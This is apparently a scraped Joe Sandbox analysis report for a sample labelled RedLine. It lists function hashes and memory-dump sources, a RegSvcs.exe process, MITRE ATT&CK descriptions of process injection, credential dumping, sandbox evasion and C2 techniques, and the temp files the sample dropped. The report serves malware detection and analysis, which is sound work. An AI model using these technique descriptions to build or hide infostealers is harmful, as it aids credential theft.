Opcode Fuzzy Hash: 49318eed26ddecdc6bf6d0bcf3a90066653559e8825e26ee8e196838ccf25752
Instruction Fuzzy Hash: 4DE09A3A0483869FC7438B20E9619CA3F76BF5631170590E2E854CF273CB32D89ACB50

Non-executed Functions

Function 04920040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2b94dfed213717ff81e7a1819d97f2ffc0c350a90d4d0b31ede9a09f25001d
Instruction ID: 5d823c3719cd7aa7f2bfa5f4f8ffbec9ed1cce814827796f0b508b7606527a63
Opcode Fuzzy Hash: ec2b94dfed213717ff81e7a1819d97f2ffc0c350a90d4d0b31ede9a09f25001d
Instruction Fuzzy Hash: E21273B0612F468AE710CF65ED8C1A93BB1BB45318B91C209D3626B2F5DBBC154ACF5C

Function 06AB95F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eea2e1f823d6a4b3de0c5844d0fa3c2b275194bcb70b0152d55a17e11b1bfa4
Instruction ID: 013df20a1a622640eab17f872e924568ed24ace383deec3074e00eeb62dcb87c
Opcode Fuzzy Hash: 1eea2e1f823d6a4b3de0c5844d0fa3c2b275194bcb70b0152d55a17e11b1bfa4
Instruction Fuzzy Hash: 6FE11874E001198FCB54DFA9C5809AEFBB6FF89340F24D169E514AB35AD730A941CFA0

Function 06AB91B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 934ae34650e3c1f952f4e71f0c995a1cb5e7e77af9a27fba35d0907a2e2e027f
Instruction ID: 361095185a1645fa92236a279958c92accd5720a51ed370b18475228d1ef127d
Opcode Fuzzy Hash: 934ae34650e3c1f952f4e71f0c995a1cb5e7e77af9a27fba35d0907a2e2e027f
Instruction Fuzzy Hash: 56E10974E001198FCB54DFA9C5809AEFBB6FF89305F24D169E518AB35AD730A941CFA0

Function 06ABB100 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad68cc7b37522860454749d0be96416f5496a2cc8e48e89d51f400d01ec37b7
Instruction ID: 38c0aa9dc32e75ad35ac3051bc4fd6b7a40bd525189119468277b09f5bde3936
Opcode Fuzzy Hash: dad68cc7b37522860454749d0be96416f5496a2cc8e48e89d51f400d01ec37b7
Instruction Fuzzy Hash: 24E1F974E001198FCB54DFA9C5809AEFBB6FF89304F24D169E815AB35ADB30A941CF61

Function 06AB9E60 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538f07338a10e8ed9bf7cf8a36b0484787d300bae17b1731bf542d1880c294a5
Instruction ID: 9e05191b6b5a2777c38573dec2d8ac0c74cff4118d5e4ba201ab97299831541f
Opcode Fuzzy Hash: 538f07338a10e8ed9bf7cf8a36b0484787d300bae17b1731bf542d1880c294a5
Instruction Fuzzy Hash: 5CE11774E001198FCB54DFA9C5809AEFBB6FF89340F24D16AE515AB31AD731A941CFA0

Function 06AB9A28 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66645fa548012d8e02d603e56836296759eae270fc41df3ee795a93bd8a925c0
Instruction ID: bf93693187bb8de6ddfe98c56f6680a677d5f8654e951ea926cc9ea3c551863d
Opcode Fuzzy Hash: 66645fa548012d8e02d603e56836296759eae270fc41df3ee795a93bd8a925c0
Instruction Fuzzy Hash: 57E1E874E001198FDB14DFA9C5809AEFBF6FF89304F249169E518AB35AD731A941CFA0

Function 06AB0550 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94179108ef0a36c07cdaec5e2a9880370134bc54383aa9e487bd257eb91e1ae4
Instruction ID: de786928de41d8e97411607a90f035bd9d9a83b2a4f654a6a894927a9c0feadf
Opcode Fuzzy Hash: 94179108ef0a36c07cdaec5e2a9880370134bc54383aa9e487bd257eb91e1ae4
Instruction Fuzzy Hash: 8BD1F43591065A8ECB11EFA4D990B99F771EF95300F50C79AE40977224EB70AAC9CF90

Function 06AB0560 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2dcbecd9a2b76be032a82ae2ffd0732f5c5bbc0d6996eaabdc82cfa337957ca
Instruction ID: b597488abd122ba41d3f09f3404c8ed32d371457569fea46b0422a9fc2df3675
Opcode Fuzzy Hash: b2dcbecd9a2b76be032a82ae2ffd0732f5c5bbc0d6996eaabdc82cfa337957ca
Instruction Fuzzy Hash: D8D1D43591065A8ECB11EFA4D990B99F771EF95300F50C79AE40977224EB70AAC9CF90

Function 006BD344 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e98c31792d5f4fad77aafa2aba6f88d703935994a5569cf19110e9298ceefc6
Instruction ID: 55b57607f3fe3fcd4ceac8fcb9eff27b5d7d93706f03784b573b1176b1616279
Opcode Fuzzy Hash: 8e98c31792d5f4fad77aafa2aba6f88d703935994a5569cf19110e9298ceefc6
Instruction Fuzzy Hash: 92A14A72A002198FCF15DFA4C8509EEB7B2FF84300B15857AE905AB276DB75E986CB40

Function 04920006 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed3266a7d6df353ed44072262c2433c02ba29c571829460643af5838f8c2c7a
Instruction ID: 025010840025b145cb1840107c4dea6e1bac1399c1c4da7d5a7c998bb31faaa4
Opcode Fuzzy Hash: 9ed3266a7d6df353ed44072262c2433c02ba29c571829460643af5838f8c2c7a
Instruction Fuzzy Hash: 17C107B0902F468FD711CF65ED881A93BB1BB85324B558309D3626B2F5DBBC148ACF58

Analysis Process: RegSvcs.exePID: 744, Parent PID: 1860COMMON

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	22
Total number of Limit Nodes:	1

Executed Functions

Function 00CA0CE5 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNEL32 ref: 00CA0D47

Memory Dump Source

Source File: 00000003.00000002.1992405338.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_RegSvcs.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 1cefa301690dfb8a3a6036a2409a5cbb81f13afb56df9e40fcce1aa92b63e275
Instruction ID: 62f964f1ab4fcebeb1b2421d3330ce3215befb2301703cda33edb6493db317fa
Opcode Fuzzy Hash: 1cefa301690dfb8a3a6036a2409a5cbb81f13afb56df9e40fcce1aa92b63e275
Instruction Fuzzy Hash: 001125B1D002598FCB20DFAAD5457DEBBF4AB88324F20882AD459A7250CB75A944CBA4

Function 00CA0CE8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNEL32 ref: 00CA0D47

Memory Dump Source

Source File: 00000003.00000002.1992405338.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_RegSvcs.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 6f71691bf841796f3f4fdf8e22655f15af4f7df95c3c87b7462be6bf3133685b
Instruction ID: 9baa10fc6379a80a0d380c29718440c303648d776325f33185f59d42ed2eadd3
Opcode Fuzzy Hash: 6f71691bf841796f3f4fdf8e22655f15af4f7df95c3c87b7462be6bf3133685b
Instruction Fuzzy Hash: 121136B1D003498FCB20DFAAD5457DEFBF4AB48324F208419C459A7250CB75A544CFA4

Function 00C4D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c404f01f326dbe6321b4e8d61c549b9cdad764de793097ad497f41fcaaeb79a
Instruction ID: 2ff087ba3f05ef75bcd2ca72e32987e936a19f86a24be43d1463bf08cabd4012
Opcode Fuzzy Hash: 3c404f01f326dbe6321b4e8d61c549b9cdad764de793097ad497f41fcaaeb79a
Instruction Fuzzy Hash: 92210671500240DFCB15EF14D9C0B2ABFA5FB88324F24C269ED0A0B256C336D856DBA1

Function 00C4D5CC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dffd759ad963ec5f9d95f98c2ac0fcc2fb9b4b955d9bc5e8fbf023f4dae461e0
Instruction ID: e79ea623b4f7148b390f32765ab09cf8e82d2cab2c992a65a81e2efeccc7360e
Opcode Fuzzy Hash: dffd759ad963ec5f9d95f98c2ac0fcc2fb9b4b955d9bc5e8fbf023f4dae461e0
Instruction Fuzzy Hash: E82167B1504204DFCB04EF14D9C0B6BBF65FB98324F20C9ADE80A0B256C336D856C7A1

Function 00C5D2C4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992241583.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c5d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac852a8b68c207f0d0e4f4dfcce6207da573e4356775ee034fa008df2bbab49
Instruction ID: b481f37e76c5fd847c19c1be1e8e9153c2e6676b60b6fe25a42dd7ecc12b3f96
Opcode Fuzzy Hash: eac852a8b68c207f0d0e4f4dfcce6207da573e4356775ee034fa008df2bbab49
Instruction Fuzzy Hash: E3213879504300DFDB20DF14D9C4B2ABB75FB84325F24C569DC4A4B266C33AD88ACAA6

Function 00C5D474 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992241583.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c5d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f8158839e965af9c1ce22d2a3f34d865e8c7f0313d7a322200fe8412f3b7e75
Instruction ID: 5cc6775f15b0f52b4257eb2eb2f14b3d1269ff03d050e83ce091cb35736034d9
Opcode Fuzzy Hash: 2f8158839e965af9c1ce22d2a3f34d865e8c7f0313d7a322200fe8412f3b7e75
Instruction Fuzzy Hash: 2421F5B9504300DFCB14DF14D5C4B26BB65FB84319F60C569DC4B4B256C336D88ACA66

Function 00C4D04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction ID: a267ee0f2395b085c19ee741e9be92ac362f5b2c7c768fb07837a79a402943e7
Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction Fuzzy Hash: 7521CD72504280DFCB06DF00D9C4B1ABF72FB88324F24C2A9DD490A656C33AD926CB91

Function 00C4D5C7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 2847d8c179b4f660ab642e9dcc27f9fe99ca204bdb313f96c4d84ec8b85e354f
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 2911E676504244CFCB06DF10D5C4B56BF72FB94314F25C6AAEC490B256C336D95ACBA1

Function 00C5D46F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992241583.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c5d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 42c24f790fcba2144c51390758246cb9a731a12c3890d951334e53938b8fc9b9
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: A711BBB9504380CFCB11CF10C5C4B15BBA1FB88319F24C6AADC4A4B256C33AD94ACB62

Function 00C5D2BF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992241583.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c5d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 2bee2cc879d12ed352273f2f04215cf96d3ff95f2f527cf60e937e1fbfae2529
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: AB11907A504280CFDB11CF14D5C4B19BB71FB84324F24C6AADC494B656C33AD94ACBA2

Function 00C4DA95 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 101b20ea305ce4c830c2d30a8b6d98cb071dae1c4e559d3b128a9ede2150c0aa
Instruction ID: 3ce181c5061f768c233ca9816205d5a96b080a826be044d6acb9b29970018232
Opcode Fuzzy Hash: 101b20ea305ce4c830c2d30a8b6d98cb071dae1c4e559d3b128a9ede2150c0aa
Instruction Fuzzy Hash: A001263100C3409AE710AF2ADDC4B67FFE8FF51320F18C46AED1A0A286C679D840D672

Function 00C4DA94 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7904fbfbb8e2757f7ab3252827f2342bd26654938f3e1cb840d78f1ad8da2090
Instruction ID: 153c15d28c2a491fa5494e3e4d28ed4aa3b1aa2cec7ead1c312f21b1cf5b70e4
Opcode Fuzzy Hash: 7904fbfbb8e2757f7ab3252827f2342bd26654938f3e1cb840d78f1ad8da2090
Instruction Fuzzy Hash: 4DF0CD71008340AEEB108E1AD8C8B62FFE8FB51334F18C45AED090B286C2799840CAB1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MfzXU6tKOq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MfzXU6tKOq.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Temp\tmp1B6F.tmp

C:\Users\user\AppData\Local\Temp\tmp1B70.tmp

C:\Users\user\AppData\Local\Temp\tmp1B81.tmp

C:\Users\user\AppData\Local\Temp\tmp1B82.tmp

C:\Users\user\AppData\Local\Temp\tmp1B93.tmp

C:\Users\user\AppData\Local\Temp\tmp1B94.tmp

C:\Users\user\AppData\Local\Temp\tmp1BA4.tmp

C:\Users\user\AppData\Local\Temp\tmp1BB5.tmp

C:\Users\user\AppData\Local\Temp\tmp1BC5.tmp

C:\Users\user\AppData\Local\Temp\tmp1BD6.tmp

